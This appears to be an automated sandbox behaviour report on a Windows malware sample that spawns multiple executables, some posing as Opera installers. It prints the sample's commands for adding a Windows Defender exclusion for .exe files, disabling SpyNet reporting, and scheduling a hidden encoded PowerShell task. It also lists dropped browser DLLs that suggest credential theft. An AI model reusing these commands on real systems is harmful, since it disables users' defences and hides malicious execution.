Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	Process created: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6c4774f0,0x6c477500,0x6c47750c
Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gXUhwMAMn" /SC once /ST 08:40:27 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\6V2xKGSdzZOG2l67fqdIp9iJ.exe "C:\Users\user\AppData\Local\6V2xKGSdzZOG2l67fqdIp9iJ.exe"
Source: C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe	Process created: C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6b3d74f0,0x6b3d7500,0x6b3d750c
Source: C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Process created: C:\Users\user\AppData\Local\Temp\7zSD77.tmp\Install.exe .\Install.exe
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zSD77.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\LnQdFAFVk46H7elzEZZ3Xdvx.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\LnQdFAFVk46H7elzEZZ3Xdvx.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\BRaFXbmvcphOkoXIZ6VZLdvL.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z35dvta3.tve.ps1

Jump to behavior

Source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1636463543.0000012FFCCCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS PROVIDERSPROP ( PROVIDERID TEXT NOT NULL COLLATE NOCASE CHECK(PROVIDERID <> ''), VARIABLE TEXT NOT NULL COLLATE NOCASE CHECK(VARIABLE <> ''), VALUE TEXT, TYPE INTEGER, PRIMARY KEY(PROVIDERID, VARIABLE));
Source: yYAwgDWrkYJyyOGvYzyiJrxu.exe	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1636463543.0000012FFCCCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS COMPLETEDUPDATES ( PROVIDERID TEXT NOT NULL COLLATE NOCASE CHECK(PROVIDERID <> ''), UPDATEID TEXT NOT NULL COLLATE NOCASE CHECK(UPDATEID <> ''), TIME TEXT, TITLE TEXT, DESCRIPTION TEXT, MOREINFOURL TEXT, HISTORYCATEGORY TEXT, UNINSTALL INTEGER, PRIMARY KEY(PROVIDERID, UPDATEID));
Source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1636463543.0000012FFCCCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS UPDATESPROP ( PROVIDERID TEXT NOT NULL COLLATE NOCASE CHECK(PROVIDERID <> ''), UPDATEID TEXT NOT NULL COLLATE NOCASE CHECK(UPDATEID <> ''), VARIABLE TEXT NOT NULL COLLATE NOCASE CHECK(VARIABLE <> ''), VALUE TEXT, TYPE INTEGER, PRIMARY KEY(PROVIDERID, UPDATEID, VARIABLE) FOREIGN KEY(PROVIDERID, UPDATEID) REFERENCES UPDATES(PROVIDERID, UPDATEID) ON DELETE CASCADE);
Source: BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.2525549015.0000000009767000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1636463543.0000012FFCCCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS ACTIONRECORDS ( PROVIDERID TEXT NOT NULL COLLATE NOCASE CHECK(PROVIDERID <> ''), UPDATEID TEXT NOT NULL COLLATE NOCASE CHECK(UPDATEID <> ''), TIME TEXT, ACTION TEXT, ACTIONCLASS TEXT, RESULT INTEGER, PRIMARY KEY(PROVIDERID, UPDATEID, TIME) FOREIGN KEY(PROVIDERID, UPDATEID) REFERENCES UPDATES(PROVIDERID, UPDATEID) ON DELETE CASCADE);
Source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1636463543.0000012FFCCCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS VARIABLES ( KEY TEXT NOT NULL COLLATE NOCASE CHECK(KEY <> ''), VALUE TEXT, TYPE INTEGER, PRIMARY KEY(KEY));
Source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1636463543.0000012FFCCCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS UPDATES ( PROVIDERID TEXT NOT NULL COLLATE NOCASE CHECK(PROVIDERID <> ''), UPDATEID TEXT NOT NULL COLLATE NOCASE CHECK(UPDATEID <> ''), SERIALIZEDUPDATE BLOB, PRIMARY KEY(PROVIDERID, UPDATEID));

Source: file.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\file.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6036:120:WilError_03
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Mutant created: \Sessions\1\BaseNamedObjects\Je35ClientPPWW_4
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8144:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Opera/Installer/C:/Users/user/AppData/Local/Programs/Opera
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_03

Source: r1O81gOTKkD0PfSdUigHGcl2.exe	String found in binary or memory: ran-launcher
Source: r1O81gOTKkD0PfSdUigHGcl2.exe	String found in binary or memory: https://addons.opera.com/extensions/download/be76331b95dfc399cd776d2fc68021e0db03cc4f
Source: r1O81gOTKkD0PfSdUigHGcl2.exe	String found in binary or memory: replace-addons-extensions-with-gx-store-substitutes
Source: r1O81gOTKkD0PfSdUigHGcl2.exe	String found in binary or memory: run-at-startup-default
Source: r1O81gOTKkD0PfSdUigHGcl2.exe	String found in binary or memory: run-at-startup
Source: r1O81gOTKkD0PfSdUigHGcl2.exe	String found in binary or memory: installer-bypass-launcher
Source: r1O81gOTKkD0PfSdUigHGcl2.exe	String found in binary or memory: video-on-start-page
Source: r1O81gOTKkD0PfSdUigHGcl2.exe	String found in binary or memory: yat-emoji-addresses
Source: r1O81gOTKkD0PfSdUigHGcl2.exe	String found in binary or memory: When enabled, https://addons.opera.com/en/extensions/details/dify-cashback/ extension will be added to the user's extensions
Source: r1O81gOTKkD0PfSdUigHGcl2.exe	String found in binary or memory: Local\%ls/Installer/UI_lock
Source: r1O81gOTKkD0PfSdUigHGcl2.exe	String found in binary or memory: master-copy-installation
Source: r1O81gOTKkD0PfSdUigHGcl2.exe	String found in binary or memory: launchopera-on-os-start
Source: r1O81gOTKkD0PfSdUigHGcl2.exe	String found in binary or memory: OperaInstaller/InstallationInterrupted
Source: r1O81gOTKkD0PfSdUigHGcl2.exe	String found in binary or memory: enable-installer-stats
Source: r1O81gOTKkD0PfSdUigHGcl2.exe	String found in binary or memory: test-pre-installed-extensions-dir
Source: r1O81gOTKkD0PfSdUigHGcl2.exe	String found in binary or memory: Try '%ls --help' for more information.
Source: r1O81gOTKkD0PfSdUigHGcl2.exe	String found in binary or memory: Try '%ls --help' for more information.
Source: r1O81gOTKkD0PfSdUigHGcl2.exe	String found in binary or memory: show-eula-window-on-start
Source: r1O81gOTKkD0PfSdUigHGcl2.exe	String found in binary or memory: post-elevated-install-tasks
Source: r1O81gOTKkD0PfSdUigHGcl2.exe	String found in binary or memory: Global\Opera/Installer/
Source: r1O81gOTKkD0PfSdUigHGcl2.exe	String found in binary or memory: all-installer-experiments
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: https://addons.opera.com/extensions/download/be76331b95dfc399cd776d2fc68021e0db03cc4f
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: ran-launcher
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: replace-addons-extensions-with-gx-store-substitutes
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: run-at-startup
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: run-at-startup-default
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: video-on-start-page
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: yat-emoji-addresses
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: installer-bypass-launcher
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: When enabled, https://addons.opera.com/en/extensions/details/dify-cashback/ extension will be added to the user's extensions
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: Local\%ls/Installer/UI_lock
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: OperaInstaller/InstallationInterrupted
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: enable-installer-stats
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: launchopera-on-os-start
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: master-copy-installation
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: show-eula-window-on-start
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: test-pre-installed-extensions-dir
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: Try '%ls --help' for more information.
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: Try '%ls --help' for more information.
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: post-elevated-install-tasks
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: Global\Opera/Installer/
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: all-installer-experiments
Source: LnQdFAFVk46H7elzEZZ3Xdvx.exe	String found in binary or memory: https://addons.opera.com/extensions/download/be76331b95dfc399cd776d2fc68021e0db03cc4f
Source: LnQdFAFVk46H7elzEZZ3Xdvx.exe	String found in binary or memory: ran-launcher
Source: LnQdFAFVk46H7elzEZZ3Xdvx.exe	String found in binary or memory: replace-addons-extensions-with-gx-store-substitutes
Source: LnQdFAFVk46H7elzEZZ3Xdvx.exe	String found in binary or memory: run-at-startup
Source: LnQdFAFVk46H7elzEZZ3Xdvx.exe	String found in binary or memory: run-at-startup-default
Source: LnQdFAFVk46H7elzEZZ3Xdvx.exe	String found in binary or memory: video-on-start-page
Source: LnQdFAFVk46H7elzEZZ3Xdvx.exe	String found in binary or memory: yat-emoji-addresses
Source: LnQdFAFVk46H7elzEZZ3Xdvx.exe	String found in binary or memory: installer-bypass-launcher
Source: LnQdFAFVk46H7elzEZZ3Xdvx.exe	String found in binary or memory: When enabled, https://addons.opera.com/en/extensions/details/dify-cashback/ extension will be added to the user's extensions
Source: LnQdFAFVk46H7elzEZZ3Xdvx.exe	String found in binary or memory: Local\%ls/Installer/UI_lock
Source: LnQdFAFVk46H7elzEZZ3Xdvx.exe	String found in binary or memory: OperaInstaller/InstallationInterrupted
Source: LnQdFAFVk46H7elzEZZ3Xdvx.exe	String found in binary or memory: enable-installer-stats
Source: LnQdFAFVk46H7elzEZZ3Xdvx.exe	String found in binary or memory: launchopera-on-os-start
Source: LnQdFAFVk46H7elzEZZ3Xdvx.exe	String found in binary or memory: master-copy-installation
Source: LnQdFAFVk46H7elzEZZ3Xdvx.exe	String found in binary or memory: show-eula-window-on-start
Source: LnQdFAFVk46H7elzEZZ3Xdvx.exe	String found in binary or memory: test-pre-installed-extensions-dir
Source: LnQdFAFVk46H7elzEZZ3Xdvx.exe	String found in binary or memory: Try '%ls --help' for more information.
Source: LnQdFAFVk46H7elzEZZ3Xdvx.exe	String found in binary or memory: Try '%ls --help' for more information.
Source: LnQdFAFVk46H7elzEZZ3Xdvx.exe	String found in binary or memory: post-elevated-install-tasks
Source: LnQdFAFVk46H7elzEZZ3Xdvx.exe	String found in binary or memory: Global\Opera/Installer/
Source: LnQdFAFVk46H7elzEZZ3Xdvx.exe	String found in binary or memory: all-installer-experiments
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: https://addons.opera.com/extensions/download/be76331b95dfc399cd776d2fc68021e0db03cc4f
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: ran-launcher
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: replace-addons-extensions-with-gx-store-substitutes
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: run-at-startup
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: run-at-startup-default
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: video-on-start-page
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: yat-emoji-addresses
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: installer-bypass-launcher
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: When enabled, https://addons.opera.com/en/extensions/details/dify-cashback/ extension will be added to the user's extensions
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: Local\%ls/Installer/UI_lock
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: OperaInstaller/InstallationInterrupted
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: enable-installer-stats
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: launchopera-on-os-start
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: master-copy-installation
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: show-eula-window-on-start
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: test-pre-installed-extensions-dir
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: Try '%ls --help' for more information.
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: Try '%ls --help' for more information.
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: post-elevated-install-tasks
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: Global\Opera/Installer/
Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: all-installer-experiments

Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe

File written: C:\Windows\System32\GroupPolicy\gpt.ini

Source: C:\Users\user\Pictures\3igcf6uAz0sWTHiwyuTtf5S5.exe

File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static file information: File size 1153896 > 1048576

Source: file.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x117a00

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: RuntimeBroker.pdbUGP source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1637207390.0000012FFC6E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RuntimeBroker.pdb source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1637207390.0000012FFC6E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\x64\Release\XBundlerTlsHelper.pdb source: yYAwgDWrkYJyyOGvYzyiJrxu.exe
Source:	Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer.exe.pdb source: OPqTdTFbxWlK6znimRD995XD.exe
Source:	Binary string: WmiPrvSE.pdbUGP source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1636955898.0000012FFC6E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer.exe.pdbp source: r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000E71000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: backgroundTaskHost.pdb source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1636955898.0000012FFC6E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MoUsoCoreWorker.pdbGCTL source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1636463543.0000012FFCCCE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: caspol.pdb source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1658638420.0000012FFC6F5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: spoolsv.pdb source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1646448289.0000012FFCCC1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\wivapasiyuvaw_kicuwu\yupo-37\tun.pdb source: BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000000.1502064925.0000000000401000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: b.dll.pdb source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000000.1505650819.0000000000B4D000.00000080.00000001.01000000.00000008.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000008.00000000.1510532640.0000000000B4D000.00000080.00000001.01000000.00000008.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000000.1520861746.00000000010CD000.00000080.00000001.01000000.0000000D.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: yYAwgDWrkYJyyOGvYzyiJrxu.exe
Source:	Binary string: MoUsoCoreWorker.pdb source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1636463543.0000012FFCCCE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WmiPrvSE.pdb source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1636955898.0000012FFC6E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: spoolsv.pdbUGP source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1646448289.0000012FFCCC1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: +.exe.pdb source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000000.1505650819.0000000000B4D000.00000080.00000001.01000000.00000008.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000008.00000000.1510532640.0000000000B4D000.00000080.00000001.01000000.00000008.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000000.1520861746.00000000010CD000.00000080.00000001.01000000.0000000D.sdmp
Source:	Binary string: C:\yomux\vopey\safuvitizidoz-xoy28\lovihizonohe.pdb source: 8AbV0HUy7VtZhy8wnNLXmsko.exe, 0000000E.00000001.1532314523.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, TNpJBjREJ9Gyf03FTGsVwgMm.exe, 0000001E.00000001.1750064546.0000000000401000.00000020.00000001.01000000.0000001A.sdmp
Source:	Binary string: +.exe.pdbp source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000000.1505650819.0000000000B4D000.00000080.00000001.01000000.00000008.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000008.00000000.1510532640.0000000000B4D000.00000080.00000001.01000000.00000008.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000000.1520861746.00000000010CD000.00000080.00000001.01000000.0000000D.sdmp
Source:	Binary string: backgroundTaskHost.pdbGCTL source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1636955898.0000012FFC6E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ;C:\wivapasiyuvaw_kicuwu\yupo-37\tun.pdb source: BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000000.1502064925.0000000000401000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer_lib.dll.pdb source: r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp

Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Code function: 32_2_00411360 push ecx; mov dword ptr [esp], ecx	32_2_00411361
Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Code function: 32_2_00413954 push eax; ret	32_2_00413972
Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Code function: 32_2_00413CC0 push eax; ret	32_2_00413CEE

Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe

Code function: 32_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

32_2_00418320

Source: file.exe

Static PE information: 0xD08B56F9 [Thu Nov 14 06:51:37 2080 UTC]

Source: initial sample

Static PE information: section name: .text entropy: 7.195511453858471

Source: file.exe, yk9a1efD2ZWxqLT.cs	High entropy of concatenated method names: 'cdIzrfxFCRbyW', '_7Uq1LFhBJPw5pyT2GuVi4MbE', 'lWkF8OSJvxN9nYcR1Uerj', 'ayr2zdLMZoltQubXR'
Source: file.exe, AT45mCn6UQxJvVf8.cs	High entropy of concatenated method names: 'KPYCQAFZO4x97egX', 'JEp6DRlb4MyjtKZTocAXwFCs', 'o5nMUG2RHkuhCt7iTzw64', 'v7VUNgSaO2Qy'

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe

Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
